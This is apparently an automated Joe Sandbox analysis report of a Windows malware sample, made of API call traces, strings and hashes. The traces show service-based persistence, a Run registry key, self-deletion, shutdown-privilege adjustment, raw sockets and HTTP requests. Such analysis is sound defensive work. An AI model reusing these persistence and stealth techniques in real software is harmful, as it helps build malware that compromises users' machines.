                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Librarystrlen$FreeLoadmemset
                                                                    • String ID: H$Hackeroo$HttpOpenRequestA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetOpenA$InternetReadFile$a$c$e$k$o$o$r
                                                                    • API String ID: 617352072-830452295
                                                                    • Opcode ID: b402d0974125de774299138ddefa45d9552fcc76887086e3f38202d1b3a9aec7
                                                                    • Instruction ID: ba6a2463532bda89d1bc4c72a8bc768b2cd287c781cd4b76582bc51c350ccd77
                                                                    • Opcode Fuzzy Hash: b402d0974125de774299138ddefa45d9552fcc76887086e3f38202d1b3a9aec7
                                                                    • Instruction Fuzzy Hash: D5D1A160C083DCDDEF12C7A8C8487DEBFB55F16748F084099D5886A292C7BA0659CB76
                                                                    Function 0040ADF7 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 195stringsleepthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$_mbscpy$strncpy$strlen$ExitSleepThreadUseratoistrstr
                                                                    • String ID: ^*%%RFTGYHJIRTG*(&^%DFG.asp$http://
                                                                    • API String ID: 3594089800-2088177147
                                                                    • Opcode ID: aa3b83fa77a598f9d99798c640f550db1c5f0176ecd428ee98287a4306a3aaf2
                                                                    • Instruction ID: 3a3d364c3fafddd854bf2716e587e0a32d8112279dbd52e463233622ee5f68c7
                                                                    • Opcode Fuzzy Hash: aa3b83fa77a598f9d99798c640f550db1c5f0176ecd428ee98287a4306a3aaf2
                                                                    • Instruction Fuzzy Hash: 61717E61D0438DAAEB11D7E4CC89FDFBFAC9F16348F044096E248B6182D7B99648C776
                                                                    Function 100083B0 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 139registrystringprocessCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 100083CF
                                                                    • strrchr.MSVCRT ref: 100083D9
                                                                    • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000), ref: 100083FA
                                                                    • RegQueryValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 10008419
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 10008424
                                                                    • memset.MSVCRT ref: 10008434
                                                                    • wsprintfA.USER32 ref: 1000844C
                                                                    • RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,00000000), ref: 1000846C
                                                                    • memset.MSVCRT ref: 10008487
                                                                    • RegQueryValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 100084A3
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 100084A8
                                                                    • strstr.MSVCRT ref: 100084BC
                                                                    • strstr.MSVCRT ref: 100084D0
                                                                    • lstrcatA.KERNEL32(?,10012C44), ref: 100084EA
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 100084F6
                                                                    • lstrcpyA.KERNEL32(00000000,00000000), ref: 100084FE
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,00000000), ref: 10008537
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$CloseOpenQueryValuelstrcatstrstr$CreateProcesslstrcpystrrchrwsprintf
                                                                    • String ID: "%1$%s\shell\open\command$D
                                                                    • API String ID: 742877492-1634606264
                                                                    • Opcode ID: 99e288cdf052f4f19229a7209b4027f9264ad67bd1c5e31c10d1caa20681c233
                                                                    • Instruction ID: 1601d28fbc1829684837d70fe9aeed38dff592e81ea228818451e7e84f789ac0
                                                                    • Opcode Fuzzy Hash: 99e288cdf052f4f19229a7209b4027f9264ad67bd1c5e31c10d1caa20681c233
                                                                    • Instruction Fuzzy Hash: 67412DB290016CBAEB11DB90CC89EEF7B7CEB48785F1400A5F605E6054D735AB99CBA0
                                                                    Function 10009075 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 116sleepregistryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegisterServiceCtrlHandlerA.ADVAPI32(Rsjshd fzfgkqcm,1000918B), ref: 1000908B
                                                                    • SetServiceStatus.ADVAPI32(00000000,100156A0), ref: 100090DB
                                                                    • Sleep.KERNEL32(000001F4), ref: 100090E9
                                                                    • GetVersionExA.KERNEL32(?), ref: 10009100
                                                                    • SetServiceStatus.ADVAPI32(100156A0), ref: 10009120
                                                                      • Part of subcall function 10008E92: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,75A78400,100098BA), ref: 10008EAD
                                                                      • Part of subcall function 10008E92: CloseHandle.KERNEL32(00000000,?,?,?,?,?,75A78400,100098BA), ref: 10008EB4
                                                                    • Sleep.KERNEL32(0000003C), ref: 10009129
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000913F
                                                                    • wsprintfA.USER32 ref: 10009158
                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000916E
                                                                    • SetServiceStatus.ADVAPI32(100156A0), ref: 10009181
                                                                    • exit.MSVCRT ref: 10009185
                                                                    • SetServiceStatus.ADVAPI32(100156A0,100156A0,750904E0,00000001), ref: 100091C8
                                                                    • Sleep.KERNEL32(000001F4), ref: 100091CF
                                                                    • SetServiceStatus.ADVAPI32(100156A0), ref: 100091E9
                                                                    • SetServiceStatus.ADVAPI32(100156A0,100156A0,750904E0,00000001), ref: 1000920C
                                                                    • Sleep.KERNEL32(000001F4), ref: 10009213
                                                                    • SetServiceStatus.ADVAPI32(100156A0,100156A0,750904E0,00000001), ref: 10009247
                                                                    • Sleep.KERNEL32(000001F4), ref: 1000924E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$Status$Sleep$CloseHandle$CtrlFileHandlerModuleNameObjectRegisterSingleVersionWaitexitwsprintf
                                                                    • String ID: %s Win7$Rsjshd fzfgkqcm
                                                                    • API String ID: 617891212-61262810
                                                                    • Opcode ID: 737f2e6e8c10537c1ee20303616d61b8bd7260fdd04b5b1d61250eaab3d21468
                                                                    • Instruction ID: 29179e968a3b72ecd081788843c22f13cd714ac3f9978304fd6e047acabf0a54
                                                                    • Opcode Fuzzy Hash: 737f2e6e8c10537c1ee20303616d61b8bd7260fdd04b5b1d61250eaab3d21468
                                                                    • Instruction Fuzzy Hash: 58412E71505329EFF7109F50CD8CF967AB9EB1139BF888059E208AF1A4C7B69944CFA0
                                                                    Function 004113F8 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 101sleepstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 00411411
                                                                    • ??2@YAPAXI@Z.MSVCRT(00100000), ref: 0041141D
                                                                    • ??2@YAPAXI@Z.MSVCRT(00100000), ref: 0041143B
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00411453
                                                                    • strrchr.MSVCRT ref: 00411462
                                                                    • DefineDosDeviceA.KERNEL32(00000001,?,?), ref: 004114A6
                                                                    • Sleep.KERNEL32(00000064), ref: 004114AE
                                                                    • MoveFileExA.KERNEL32(?,\\.\killmdx,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004114FC
                                                                    • SetFileAttributesA.KERNEL32(?,00000002), ref: 0041150B
                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 00411515
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0041151E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00411526
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$??2@??3@$AttributesCreateDefineDeviceDirectoryFolderModuleMoveNamePathSleepSpecialstrrchr
                                                                    • String ID: \\.\killmdx$d$i$k$l$l$m$x
                                                                    • API String ID: 2050045017-181802781
                                                                    • Opcode ID: c8a5b0d99c3c016a99753ecf6730700b41eb22e41fc6f651bde787629d062554
                                                                    • Instruction ID: a9088f504c7827f249a5632afeb7e39411e64d0ceace578ddab12e178ae7cd40
                                                                    • Opcode Fuzzy Hash: c8a5b0d99c3c016a99753ecf6730700b41eb22e41fc6f651bde787629d062554
                                                                    • Instruction Fuzzy Hash: 19416A7180439CFEFB02D7E4CC89FDEBFB99B16304F044099E244A6192D6BA56598B61
                                                                    Function 1000A26E Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 84libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,SeShutdownPrivilege,?,?,1000521F,SeShutdownPrivilege,00000001,?,10005F99,?), ref: 1000A286
                                                                    • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1000A296
                                                                    • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1000A2A1
                                                                    • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1000A2AC
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,1000521F,SeShutdownPrivilege,00000001,?,10005F99,?), ref: 1000A2B6
                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 1000A2C1
                                                                    • LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 1000A309
                                                                    • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 1000A311
                                                                    • CloseHandle.KERNEL32(?), ref: 1000A320
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1000A331
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1000A33C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryProc$Load$Free$CloseHandle
                                                                    • String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
                                                                    • API String ID: 2887716753-2040270271
                                                                    • Opcode ID: eb94e49701d1cf1157ef0584d2a22ceb1825a5a0700ea7574f152509f5e18a49
                                                                    • Instruction ID: d0f0468780b017e01151438bf255353ba3d663cc7183264dfe9b1facf1a7b364
                                                                    • Opcode Fuzzy Hash: eb94e49701d1cf1157ef0584d2a22ceb1825a5a0700ea7574f152509f5e18a49
                                                                    • Instruction Fuzzy Hash: 75211B71D0021DBAEB119BF5CC48FEEBFB8EF58241F014555F601E6150DB749A84CBA0
                                                                    Function 10005E86 Relevance: 35.0, APIs: 7, Strings: 13, Instructions: 42servicefilestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10005E95
                                                                    • OpenServiceA.ADVAPI32(00000000,Rsjshd fzfgkqcm,000F01FF), ref: 10005EA6
                                                                    • DeleteService.ADVAPI32(00000000), ref: 10005EAD
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10005EBF
                                                                    • lstrcatA.KERNEL32(?,?), ref: 10005F04
                                                                    • DeleteFileA.KERNEL32(?), ref: 10005F11
                                                                    • exit.MSVCRT ref: 10005F19
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteOpenService$DirectoryFileManagerSystemexitlstrcat
                                                                    • String ID: .$D$Rsjshd fzfgkqcm$\$a$e$e$f$k$l$t$u$y
                                                                    • API String ID: 3392600227-1081949225
                                                                    • Opcode ID: 28d876264f97ccfa2923b9d42dad7beb551e81a6745ba88f4992f0cb51909809
                                                                    • Instruction ID: c22a01dc393668847851f56136fa3f06600cf10012881ae33b39abbd7e87e008
                                                                    • Opcode Fuzzy Hash: 28d876264f97ccfa2923b9d42dad7beb551e81a6745ba88f4992f0cb51909809
                                                                    • Instruction Fuzzy Hash: 4B110D7080839CEAFB0197E4CC4DBCDBFA95B11749F0880C4E284AA192C6BA5259C736
                                                                    Function 0040DFA5 Relevance: 33.7, APIs: 17, Strings: 2, Instructions: 469memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0040E6F4
                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 0040E707
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtualmemcpy
                                                                    • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$rsion\Run
                                                                    • API String ID: 1674066667-974480386
                                                                    • Opcode ID: 40cb11ceb4754c1a5c56e879a2c8a437530fdfdeb05461a0697ad488427a9bc8
                                                                    • Instruction ID: b9a89324056626b0d0c0932be2554eebe4d1a00b522bd0b1e42a54e6f02ee4b4
                                                                    • Opcode Fuzzy Hash: 40cb11ceb4754c1a5c56e879a2c8a437530fdfdeb05461a0697ad488427a9bc8
                                                                    • Instruction Fuzzy Hash: 9202B771D00258EEEF219BA58C49FEE7B7DEB05308F0404EAF14876191D67A4EA4CF66
                                                                    Function 0040A1CE Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 225networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 0040A227
                                                                    • inet_addr.WS2_32(192.168.1.224), ref: 0040A29B
                                                                    • htonl.WS2_32(00000001), ref: 0040A2DC
                                                                    • wsprintfA.USER32 ref: 0040A364
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sockethtonlinet_addrwsprintf
                                                                    • String ID: 192.168.1.224$@$E$P
                                                                    • API String ID: 462099796-3350482742
                                                                    • Opcode ID: 56a9e7ece5f23a2d033e319e9e94635acb01b86b1ff5b11e95adcf17887bad1d
                                                                    • Instruction ID: 8d4450c782e8bac2708a001330a19cf2d6d5422db61af4f64f48f07eceae4d4a
                                                                    • Opcode Fuzzy Hash: 56a9e7ece5f23a2d033e319e9e94635acb01b86b1ff5b11e95adcf17887bad1d
                                                                    • Instruction Fuzzy Hash: 0E816F71C5038CA9EB11DBE4CC45BEEBBBCAF09304F00506AE504FB292D7B84645CB6A
                                                                    Function 00410C26 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 205stringsynchronizationsleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00410C2B
                                                                    • wsprintfA.USER32 ref: 00410C5C
                                                                    • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00410C70
                                                                    • GetLastError.KERNEL32 ref: 00410C7C
                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 00410C8A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00410C91
                                                                    • exit.MSVCRT ref: 00410C98
                                                                      • Part of subcall function 00409E60: setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00409E85
                                                                      • Part of subcall function 00409E60: CancelIo.KERNEL32(?,?,?,?,00409A9F), ref: 00409E8E
                                                                      • Part of subcall function 00409E60: InterlockedExchange.KERNEL32(?,00000000), ref: 00409E9A
                                                                      • Part of subcall function 00409E60: closesocket.WS2_32(?), ref: 00409EA3
                                                                      • Part of subcall function 00409E60: SetEvent.KERNEL32(?,?,?,?,00409A9F), ref: 00409EAC
                                                                      • Part of subcall function 0040DD10: TerminateThread.KERNEL32(?,000000FF,?,?,?,0040DCFC), ref: 0040DD2C
                                                                      • Part of subcall function 0040DD10: CloseHandle.KERNEL32(?,?,?,?,0040DCFC), ref: 0040DD34
                                                                    • strstr.MSVCRT ref: 00410D4D
                                                                    • strncpy.MSVCRT ref: 00410D6C
                                                                    • _mbscpy.MSVCRT(00000000,?), ref: 00410D82
                                                                    • lstrcat.KERNEL32(?,?), ref: 00410D98
                                                                    • atoi.MSVCRT(?), ref: 00410DA5
                                                                    • lstrcat.KERNEL32(00000000,10012DDC), ref: 00410DC7
                                                                    • strcmp.MSVCRT ref: 00410DD9
                                                                    • GetTickCount.KERNEL32 ref: 00410DE8
                                                                    • GetTickCount.KERNEL32 ref: 00410E0B
                                                                    • WaitForSingleObject.KERNEL32(00000064,00000064), ref: 00410E7A
                                                                    • Sleep.KERNEL32(000001F4), ref: 00410E87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
